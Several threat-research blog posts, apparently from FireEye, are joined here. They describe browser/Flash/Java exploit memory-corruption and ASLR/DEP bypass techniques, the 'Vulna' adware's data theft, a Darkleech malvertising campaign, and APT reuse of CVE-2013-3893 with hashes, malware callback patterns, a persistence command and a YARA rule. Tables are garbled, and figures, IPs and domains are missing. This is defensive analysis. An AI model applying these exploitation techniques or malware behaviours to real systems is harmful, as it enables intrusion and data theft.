              Later, the malformed expression overwrites the length of a Vector.<Number> object in obj[2] to enlarge it. With a corrupted size, the attacker can use obj[2] to read from or write to memory in a huge region to locate the flash.ocx base address and overwrite a vftable to execute the payload.


              This vulnerability involves a IE CBlockContainerBlock object use-after-free error. This exploit is similar to CVE-2013-0634, but more sophisticated.

              Basically, this vulnerability modifies the arbitrary memory content using an OR instruction. This instruction is something like the following:

              or dword ptr [esi+8],20000h

              Here’s how it works:

              1. First, the attacker sprays the target heap memory with Vector.<uint> objects as follows:.12
              2. After the spray, those objects are stored aligned in a stable memory address. For example:1

                The first dword, 0x03f0, is the length of the Vector.<uint> object, and the yellow marked values correspond to the values in above spray code.

              3. If the attacker sets the esi + 8 point to 0x03f0, the size becomes 0x0203f0 after the OR operation — which is much larger than the original size.
              4. With the larger access range, the attacker can change the next object length to 0x3FFFFFF0.14
              5. From there, the attacker can access the whole memory space in the IE process. ASLR is useless because the attacker can retrieve the entire DLL images for kernel32/NTDLL directly from memory. By dynamically searching for stack pivot gadgets in the text section and locating the ZwProtectVirtualMemory native API address from the IAT, the attacker can construct a ROP chain to change the memory attribute and bypass the DEP as follows:9

              By crafting the memory layout, the attacker also allocates a Vector.<object> that contains the flash.Media.Sound() object. The attacker uses the corrupted Vector.<uint> object to search the sound object in memory and overwrite it’s vftable to point to ROP payload and shellcode.


              The use-after-free vulnerability in Firefox’s DocumentViewerImpl object allows the user to write a word value 0x0001 into an arbitrary memory location as follows:


              In above code, all the variables that start with “m” are read from the user-controlled object. If the user can set the object to meet the condition in the second “if” statement, it forces the code path into the setImageAnimationMode() call, where the memory write is triggered. Inside the setImageAnimationMode(), the code looks like the following:


              In this exploit, the attacker tries to use ArrayBuffer to craft the heap layout. In the following code, each ArrayBuffer element for var2 has the original size 0xff004.


              After triggering the vulnerability, the attacker increases the size of the array to to 0x010ff004. The attacker can also locate this ArrayBuffer by comparing the byteLength in JavaScript. Then, the attacker can read to or write from memory with the corrupted ArrayBuffer. In this case, the attacker choose to disclosure the NTDLL base address from SharedUserData (0x7ffe0300), and manually hardcoded the offset to construct the ROP payload.


              This vulnerability involves a JAVA CMM integer overflow that allows overwriting the array length field in memory. During exploitation, the array length actually expands to 0x7fffffff, and the attacker can search for the securityManager object in memory and null it to break the sandbox. This technique is much more effective than overwriting function pointers and dealing with ASLR/DEP to get native code execution.

              The Array object modification technique is much better than other techniques. For the Flash ActionScript vector technique, there are no heap spray mitigations at all. As long as you have a memory-write vulnerability, it is easily implemented.


              The following table outlines recent APT zero-day exploits and what bypass techniques they used:



              ASLR bypassing has become more and more common in zero-day attacks. We have seen previous IE zero-day exploits using Microsoft Office non-ASLR DLL to bypass it, and Microsoft also did some mitigation in their latest OS and browser to prevent use of the non-ASLR module to defeat ASLR. Because the old technique will no longer work and can be easily detected, cybercriminals will have to use the advanced exploit technique. But for specific vulnerabilities that allow writing memory, combining the Vector.<uint> and Vector.<object> is more reliable and flexible. With just one shot, extending the exploit from writing a single byte to reading or writing gigabytes is easy and works for the latest OS and browser regardless of the OS, application, or language version.

              Many researchers have published research on ASLR bypassing, such as Dion Blazakis’s JIT spray and Yuyang’s LdrHotPatchRoutine technique. But so far we haven’t seen any zero-day exploit leveraging them in the wild. The reason could be that these techniques are generic approaches to defeating ASLR. And they are usually fixed quickly after going public.

              But there is no generic way to fix vulnerability-specific issues. In the future, expect more and more zero-day exploits using similar or more advanced techniques. We may need new mitigations in our OSs and security products to defeat them.

              Thanks again to Dan Caselden and Yichong Lin for their help with this analysis.

              Ad Vulna: A Vulnaggressive (Vulnerable & Aggressive) Adware Threatening Millions

              FireEye researchers have discovered a rapidly-growing class of mobile threats represented by a popular ad library affecting apps with over 200 million downloads in total. This ad library, anonymized as "Vulna," is aggressive at collecting sensitive data and is able to perform dangerous operations such as downloading and running new components on demand. Vulna is also plagued with various classes of vulnerabilities that enable attackers to turn Vulna's aggressive behaviors against users. We coined the term “vulnaggressive” to describe this class of vulnerable and aggressive characteristics. Most vulnaggresive libraries are proprietary and it is hard for app developers to know their underlying security issues. Legitimate apps using vulnaggressive libraries present serious threats for enterprise customers. FireEye has informed both Google and the vendor of Vulna about the security issues and they are actively addressing it.

              Recently FireEye discovered a new mobile threat from a popular ad library that no other anti-virus or security vendor has reported publicly before. Mobile ad libraries are third-party software included by host apps in order to display ads. Because this library’s functionality and vulnerabilities can be used to conduct large-scale attacks on millions of users, we refer to it anonymously by the code name “Vulna” rather than revealing its identity in this blog.

              We have analyzed all Android apps with over one million downloads on Google Play, and we found that over 1.8% of these apps used Vulna. These affected apps have been downloaded more than 200 million times in total.

              Though it is widely known that ad libraries present privacy risks such as collecting device identifiers (IMEI, IMSI, etc.) and location information, Vulna presents far more severe security issues. First, Vulna is aggressive—if instructed by its server, it will collect sensitive information such as text messages, phone call history, and contacts. It also performs dangerous operations such as executing dynamically downloaded code. Second, Vulna contains a number of diverse vulnerabilities. These vulnerabilities when exploited allow an attacker to utilize Vulna’s risky and aggressive functionality to conduct malicious activity, such as turning on the camera and taking pictures without user’s knowledge, stealing two-­factor authentication tokens sent via SMS, or turning the device into part of a botnet.

              We coin the term “vulnaggressive” to describe this class of vulnerable and aggressive characteristics.

              The following is a sample of the aggressive behaviors and vulnerabilities we have discovered in Vulna:

              • Aggressive Behaviors

                • In addition to collecting information used for targeting and tracking such as device identifiers and location, as many ad libraries do, Vulna also collects the device owner's email address and the list of apps installed on the device. Furthermore, Vulna has the ability to read text messages, phone call history, and contact list, and share this data publicly without any access control through a web service that it starts on the device.

                • Vulna will download arbitrary code and execute it when instructed by the remote server.

              • Vulnerabilities

                • Vulna transfers user’s private information over HTTP in plain text, which is vulnerable to eavesdropping attacks.

                • Vulna also uses unsecured HTTP for receiving commands and dynamically loaded code from its control server. An attacker can convert Vulna to a botnet by hijacking its HTTP traffic and serving malicious commands and code.

                • Vulna uses Android’s WebView with JavaScript-­to-­Java bindings in an insecure way. An attacker can exploit this vulnerability and serve malicious JavaScript code to perform harmful operations on the device. This vulnerability is an instance of a common JavaScript binding vulnerability which has been estimated to affect over 90% of Android devices.

                  Vulna’s aggressive behaviors and vulnerabilities expose Android users, especially enterprise users, to serious security threats. By exploiting Vulna’s vulnaggressive behaviors, an attacker could download and execute arbitrary code on user’s device within Vulna's host app. From our study, many host apps containing Vulna have powerful permissions that allow controlling the camera; reading and/or writing SMS messages, phone call history, contacts, browser history and bookmarks; and creating icons on home screen. An attacker could utilize these broad permissions to perform malicious actions. For example, attackers could:

                  • steal two-factor authentication token sent via SMS
                  • view photos and other files on the SD card
                  • install icons used for phishing attacks on the home screen
                  • delete files and destroy data on demand
                  • impersonate the owner and send forged text messages to business partners
                  • delete incoming text messages without the user’s notice
                  • place phone calls
                  • use the camera to take photos without user’s notice
                  • read bookmarks or change them to point to phishing sites

                  There are many possible ways an attacker could exploit Vulna’s vulnerabilities. One example is public WiFi hijacking: when the victim’s device connects to a public WiFi hotspot (such as at a coffee shop or an airport), an attacker nearby could eavesdrop on Vulna’s traffic and inject malicious commands and code.

                  Attackers can also conduct DNS hijacking to attack users around the world, as in the Syrian Electronic Army’s recent attacks targeting Twitter, the New York Times, and Huffington Post. In a DNS hijacking attack, an attacker could modify the DNS records of Vulna’s ad servers to redirect visitors to their own control server, in order to gather information from or send malicious commands to Vulna on the victim’s device.

                  Despite the severe threats it poses, Vulna is stealthy and hard to detect:

                  • Vulna receives commands from its ad server using data encoded in HTTP header fields instead of the HTTP response body.

                  • Vulna obfuscates its code, which makes traditional analysis difficult.

                  • Vulna's behaviors can be difficult to trigger using traditional analysis. For example, in one popular game, Vulna is executed only at certain points in the game, such as when a specific level is reached, as shown in the figure below. (The figure has been partially blurred to hide the identity of the app.) When Vulna is executed, the only effect visible to the user is the ad on top of the screen. However, Vulna quietly executes its risky behaviors in the background.

                    Vulna's screen shot

                  FireEye Mobile Threat Prevention applies a unique approach and technology that made it possible to discover the security issues outlined in this post quickly and accurately despite these challenges. We have provided information about the discovered security issues,  the list of impacted apps and suggestions to both Google and the vendor of Vulna. They have confirmed the issues and they are actively addressing it.

                  In conclusion, we have discovered a new mobile threat from a popular ad library (codenamed "Vulna" for anonymity). This library is included in popular apps on Google Play which have more than 200 million downloads in total. Vulna is an instance of a rapidly­-growing class of mobile threat, which we have termed vulnaggressive ad libraries. Vulnaggressive ad libraries are disturbingly aggressive at collecting users’ sensitive data and embedding capabilities to execute dangerous operations on demand, and they also contain different classes of vulnerabilities which allow attackers to utilize their aggressive behaviors to harm users. App developers using these third-party libraries are often not aware of the security issues in them. These threats are particularly serious for enterprise customers. Furthermore, this vulnaggressive characteristic is not just limited to ad libraries; it also applies to other third-party components and apps.


                  Special thanks to FireEye team members Adrian Mettler, Peter Gilbert, Prashanth Mohan, and Andrew Osheroff for their valuable help on writing this blog. We also thank Zheng Bu and Raymond Wei for their valuable comments and feedback.

                  Appendix: Sample code snippet of collecting and sending call logs in Vulna


                  class x implements Runnable




                  List localList = get_call_log();




                  List get_call_log()


                  ArrayList localArrayList = new ArrayList();

                  Cursor cur1 = getContentResolver().query(CallLog.Calls.CONTENT_URI,

                  new String[] { "number", "type", "date" }, null, null,

                  "date DESC limit 10");

                  cur2 = cur1;

                  if (cur2 != null){

                  int i = cur2.getColumnIndex("number");

                  int j = cur2.getColumnIndex("type");

                  while (cur2.moveToNext()){

                  String str = cur2.getString(i);

                  if ((cur2.getInt(j)==2) && (!localArrayList.contains(str)))




                  return localArrayList;


              Another Darkleech Campaign

              Last week got us up close and personal with Darkleech and Blackhole with our external careers web site.

              The fun didn’t end there, this week we saw a tidal wave of Darkleech activity linked to a large-scale malvertising campaign identified by the following URL:


              Again Darkleech was up to its tricks, injecting URLs and sending victims to a landing page belonging to the Blackhole Exploit Kit, one of the most popular and effective exploit kits available today. Blackhole wreaks havoc on computers by exploiting vulnerabilities in client applications like IE, Java and Adobe, computers that are vulnerable to exploits launched by Blackhole are likely to become infected with one of several flavors of malware including ransomware, Zeus/Zbot variants and clickfraud trojans like ZeroAccess.

              We started logging hits at 21:31:00 UTC on Sunday 09/22/2013, the campaign has been ongoing, peaking Monday and tapered down through out the week.

              During most of the campaign’s run, delivery[.]globalcdnnode[.]com appeared to have gone dark, no longer serving the exploit kit’s landing page as expected and then stopped resolving altogether, yet tons of requests kept flowing.

              This left some scratching their heads as to whether the noise was a real threat.

              Indeed, it was a real threat, as Blackhole showed up to the party a couple of days later; this was confirmed by actually witnessing a system get attacked on a subsequent visit to the URL.



              Figure 1. – Session demonstrating exploit via IE browser and Java.


              The server returned the (obfuscated) Blackhole Landing page; no 404 this time.


              Figure 2 – request and response to to delivery[.]globalcdnnode[.]com.


              The next stage was to load a new URL for the malicious jar file. At this point, the unpatched Windows XP system running vulnerable Java quickly succumbed to CVE-2013-0422.


              Figure 3 – Packet capture showing JAR file being downloaded.


              Figure 4. – Some of the Java class files visible in the downloaded Jar.


              Even though our system was exploited and the browser was left in a hung state, it did not receive the payload. Given the sporadic availability during the week of both the host and exploit kit’s landing page, it’s possible the system is or was undergoing further setup and this is the prelude to yet another large-scale campaign.

              We can’t say for sure but we know this is not the last time we will see it or the crimeware actor behind it.


              Name: Alexey Prokopenko
              Organization: home
              Address: Lenina 4, kv 1
              City: Ubileine
              Province/state: LUGANSKA OBL
              Country: UA
              Postal Code: 519000
              Email: alex1978a

              By the way, this actor has a long history of malicious activity online too.

              The campaign also appears to be abusing Amazon Web Services.


              origin =
              mail addr =

              At time of this writing, the domain delivery[.]globalcdnnode[.]com was still resolving, using fast-flux DNS techniques to resolve to a different IP address every couple minutes, thwarting attempts at shutting down the domain by constantly being on the move.


              Figure 5. – The familiar Plesk control panel, residing on the server.

              This was a widespread campaign, indirectly affecting many web sites via malvertising techniques. The referring hosts run the gamut from local radio stations to high profile news, sports, and shopping sites. Given the large amounts of web traffic these types of sites see, its not surprising there was a tidal wave of requests to delivery[.]globalcdnnode[.]com. Every time a page with the malvertisement was loaded, a request was made to hXXp://, in the background.

              To give an example of what this activity looked like from DTI, you can see the numbers in the chart below.



              Figure 6. – DTI graph showing number of Darkleech detections logged each day.

              By using malvertising and or posing as a legitimate advertiser or content delivery network, the bad guys infiltrate the web advertisement ecosystem. This results in their malicious content getting loaded in your browser, often times in the background, while you browse sites that have nothing to do with the attack (as was the case in our careers site).

              Imagine a scenario where a good portion of enterprise users have a home page set to a popular news website. More than likely, the main web page has advertisements, and some of those ads could be served from 3rd party advertiser networks and or CDNs. If just one of those advertisements on the page is malicious, visitors to that page are at risk of redirection and or infection, even though the news website’s server is itself clean.

              So, when everybody shows up to work on Monday and opens their browsers, there could be a wave of clients making requests to exploit kit landing pages, if Darkleech is lurking in those advertisement waters, you could end up with a leech or 2 attached to your network.

              Hand Me Downs: Exploit and Infrastructure Reuse Among APT Campaigns

              Since we first reported on Operation DeputyDog, at least three other Advanced Persistent Threat (APT) campaigns known as Web2Crew, Taidoor, and th3bug have made use of the same exploit to deliver their own payloads to their own targets. It is not uncommon for APT groups to hand-off exploits to others, who are lower on the zero-day food chain – especially after the exploit becomes publicly available. Thus, while the exploit may be the same, the APT groups using them are not otherwise related.

              In addition, APT campaigns may reuse existing infrastructure for new attacks. There have been reports that the use of CVE-2013-3893 may have begun in July; however, this determination appears to be based solely on the fact that the CnC infrastructure used in DeputyDog had been previously used by the attackers. We have found no indication that the attackers used CVE-2013-3893 prior to August 23, 2013.

              Exploit Reuse

              Since the use of CVE-2013-3893 in Operation DeputyDog (which we can confirm happened by at least August 23, 2013), the same exploit was used by different threat actors.


              On September 25, 2013, an actor we call Web2Crew utilized CVE-2013-3893 to drop PoisonIvy (not DeputyDog malware). The exploit was hosted on a server in Taiwan ( and dropped a PoisonIvy payload (38db830da02df9cf1e467be0d5d9216b) hosted on the same server. In our recent paper, we document how to extract intelligence from Poison Ivy that can be used to cluster activity.

              The Poison Ivy binary used in this attack was configured with the following properties:

              ID: gua925

              Group: gua925

              DNS/Port: Direct:, Direct:,

              Proxy DNS/Port:

              Proxy Hijack: No

              ActiveX Startup Key:

              HKLM Startup Entry:

              File Name:

              Install Path: C:\Documents and Settings\Administrator\Desktop\runrun.exe

              Keylog Path: C:\Documents and Settings\Administrator\Desktop\runrun

              Inject: No

              Process Mutex: ;A>6gi3lW

              Key Logger Mutex:

              ActiveX Startup: No

              HKLM Startup: No

              Copy To: No

              Melt: No

              Persistence: No

              Keylogger: No

              Password: LostC0ntrol2013~2014

              This configuration matches with other Web2Crew particularly ‘gua25’ ID. Some previous Web2Crew Poison Ivy samples have been configured with similar IDs including:







              Additionally, the IP address was used to host the command and control server in this attack. A number of known Web2Crew domains previously resolved to this same IP address between August 15 and August 29.

              DATE DOMAIN
              2013-08-15 2013-08-15
              2013-08-15 2013-08-15
              2013-08-15 2013-08-15
              2013-08-15 2013-08-15
              2013-08-15 2013-08-15
              2013-08-15 2013-08-15
              2013-08-15 2013-08-15
              2013-08-15 2013-08-15
              2013-08-16 2013-08-16
              2013-08-16 2013-08-16
              2013-08-16 2013-08-16
              2013-08-16 2013-08-16
              2013-08-16 2013-08-16
              2013-08-21 2013-08-21
              2013-08-29 2013-08-29
              2013-08-29 2013-08-29
              2013-08-29 2013-08-29
              2013-08-29 2013-08-29

              We observed the Web2Crew actor targeting a financial institution in this attack as well as in previous attacks.


              The same exploit (CVE-2013-3893) has also been used by another, separate APT campaign. By at least September 26, 2013 a compromised Taiwanese Government website was used to host the same exploit, however, the payload in this case was Taidoor (not DeputyDog malware). The decoded payload has an MD5 of 666603bd2073396b7545d8166d862396. The CnC servers are and

              We found another instance of CVE-2013-3893 hosted at www.atmovies[.]com[.]tw/home/temp1.html. This dropped another Taidoor binary with the MD5 of 1b03e3de1ef3e7135fbf9d5ce7e7ccf6. This Taidoor sample connected to a command and control server at We found this sample targeting the same financial services firm targeted by the web2crew actor discussed above.

              Both of these samples were the newer versions of Taidoor that we previously described here.


              The actor we refer to as ‘th3bug’ also used CVE-2013-3893 in multiple attacks. Beginning on September 27, compromised websites hosting the Internet Explorer zero-day redirected victims to download a stage one payload (496171867521908540a26dc81b969266) from www.jessearch[.]com/dev/js/27.exe. This payload was XOR’ed with a single byte key of 0x95.

              The stage 1 payload then downloaded a PoisonIvy payload (not DeputyDog malware) via the following request:

              GET /dev/js/heap.php HTTP/1.1


              User-Agent: Mozilla/4.0 (compatible)


              Cache-Control: no-cache

              The PoisonIvy payload then connected to a command and control server at

              The deobfuscated stage 1 payload has a MD5 of 4017d0baa83c63ceff87cf634890a33f and was compiled on September 27, 2013. This may indicate that the th3bug actor also customized the IE zero-day exploit code on September 27, 2013 – well after the actors responsible for the DeputyDog malware weaponized the same exploit.

              Infrastructure Reuse

              APT groups also reuse CnC infrastructure. It is not uncommon to see a payload call back to the same CnC, even through it has been distributed via different means. For example, although the first reported use of CVE-2013-3893 in Operation DeputyDog was August 23, 2013, the CnC infrastructure had been used in earlier campaigns.

              Specifically, one of the reported DeputyDog command and control servers located at had been used in a previous attack in July 2013. During this previous attack, likely executed by the same actor responsible for the DeputyDog campaign, the IP hosted a PoisonIvy control server and was used to target a gaming company as well as high-tech manufacturing company. There is no evidence to suggest that this July attack using Poison Ivy leveraged the same CVE-2013-3893 exploit.

              We also observed usage of Trojan.APT.DeputyDog malware as early as March 26, 2013. In this attack, a Trojan.APT.DeputyDog binary (b1634ce7e8928dfdc3b3ada3ab828e84) was deployed against targets in both the high-technology manufacturing and finance verticals. This DeputyDog binary called back to a command and control server at There is also no evidence in this case to suggest that this attack used the CVE-2013-3893 exploit.

              This malware family and the CnC infrastructure is part of an ongoing campaign. Therefore, the fact that this infrastructure was active prior to the first reported use of CVE-2013-3893 does not necessarily indicate that this particular exploit was previously used. The actor responsible for the DeputyDog campaign employs a multiple of malware tools and utilizes a diverse command and control infrastructure.


              The activity associated with specific APT campaigns can be clustered and tracked by unique indicators. There are a variety of different campaigns that sometimes make use of the same malware (or sometimes widely available malware such as PoisonIvy) and the same exploits. It is not uncommon for zero-day exploits to be handed down to additional APT campaigns after they have already been used.

              • The first observed usage of CVE-2013-3893, in Operation Deputy Dog, remains August 23, 2013. However, the C2 infrastructure had been used in previous attacks in July 2013.
              • The CVE-2013-3893 has been subsequently used by at least three other APT campaigns: Taidoor, th3bug, and Web2Crew. However, other than the common use of the same exploit, these campaigns are otherwise unrelated.
              • We expect that CVE-2013-3893 will continue to be handed down to additional APT campaigns and may eventually find its way into the cyber-crime underground.

              Operation DeputyDog: Zero-Day (CVE-2013-3893) Attack Against Japanese Targets

              FireEye has discovered a campaign leveraging the recently announced zero-day CVE-2013-3893. This campaign, which we have labeled ‘Operation DeputyDog', began as early as August 19, 2013 and appears to have targeted organizations in Japan. FireEye Labs has been continuously monitoring the activities of the threat actor responsible for this campaign. Analysis based on our Dynamic Threat Intelligence cluster shows that this current campaign leveraged command and control infrastructure that is related to the infrastructure used in the attack on Bit9.

              Campaign Details

              On September 17, 2013 Microsoft published details regarding a new zero-day exploit in Internet Explorer that was being used in targeted attacks. FireEye can confirm reports that these attacks were directed against entities in Japan. Furthermore, FireEye has discovered that the group responsible for this new operation is the same threat actor that compromised Bit9 in February 2013.

              FireEye detected the payload used in these attacks on August 23, 2013 in Japan. The payload was hosted on a server in Hong Kong ( and was named “img20130823.jpg”. Although it had a .jpg file extension, it was not an image file. The file, when XORed with 0x95, was an executable (MD5: 8aba4b5184072f2a50cbc5ecfe326701).

              Upon execution, 8aba4b5184072f2a50cbc5ecfe326701 writes “28542CC0.dll” (MD5: 46fd936bada07819f61ec3790cb08e19) to this location:

              C:\Documents and Settings\All Users\Application Data\28542CC0.dll

              In order to maintain persistence, the original malware adds this registry key:


              The registry key has this value:

              rundll32.exe "C:\Documents and Settings\All Users\Application Data\28542CC0.dll",Launch

              The malware (8aba4b5184072f2a50cbc5ecfe326701) then connects to a host in South Korea ( This callback traffic is HTTP over port 443 (which is typically used for HTTPS encrypted traffic; however, the traffic is not HTTPS nor SSL encrypted). Instead, this clear-text callback traffic resembles this pattern:

              POST /info.asp HTTP/1.1

              Content-Type: application/x-www-form-urlencoded

              Agtid: [8 chars]08x

              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)


              Content-Length: 1045

              Connection: Keep-Alive

              Cache-Control: no-cache

              [8 chars]08x&[Base64 Content]

              The unique HTTP header “Agtid:” contains 8 characters followed by “08x”. The same pattern can be seen in the POST content as well.

              A second related sample was also delivered from on September 5, 2013. The sun.css file was a malicious executable with an MD5 of bd07926c72739bb7121cec8a2863ad87 and it communicated with the same communications protocol described above to the same command and control server at

              Related Samples

              We found that both droppers, bd07926c72739bb7121cec8a2863ad87 and 8aba4b5184072f2a50cbc5ecfe326701, were compiled on 2013-08-19 at 13:21:59 UTC. As we examined these files, we noticed a unique fingerprint.

              These samples both had a string that may have been an artifact of the builder used to create the binaries. This string was “DGGYDSYRL”, which we refer to as “DeputyDog”. As such, we developed the following YARA signature, based on this unique attribute:

              rule APT_DeputyDog_Strings


              author = "FireEye Labs"

              version = "1.0"

              description = "detects string seen in samples used in 2013-3893 0day attacks"

              reference = "8aba4b5184072f2a50cbc5ecfe326701"

              $mz = {4d 5a}

              $a = "DGGYDSYRL"

              ($mz at 0) and $a


              We used this signature to identify 5 other potentially related samples:

              MD5 Compile Time (UTC) C2 Server
              58dc05118ef8b11dcb5f5c596ab772fd 58dc05118ef8b11dcb5f5c596ab772fd 2013-08-19 13:21:58 2013-08-19 13:21:58
              4d257e569539973ab0bbafee8fb87582 4d257e569539973ab0bbafee8fb87582 2013-08-19 13:21:58 2013-08-19 13:21:58
              dbdb1032d7bb4757d6011fb1d077856c dbdb1032d7bb4757d6011fb1d077856c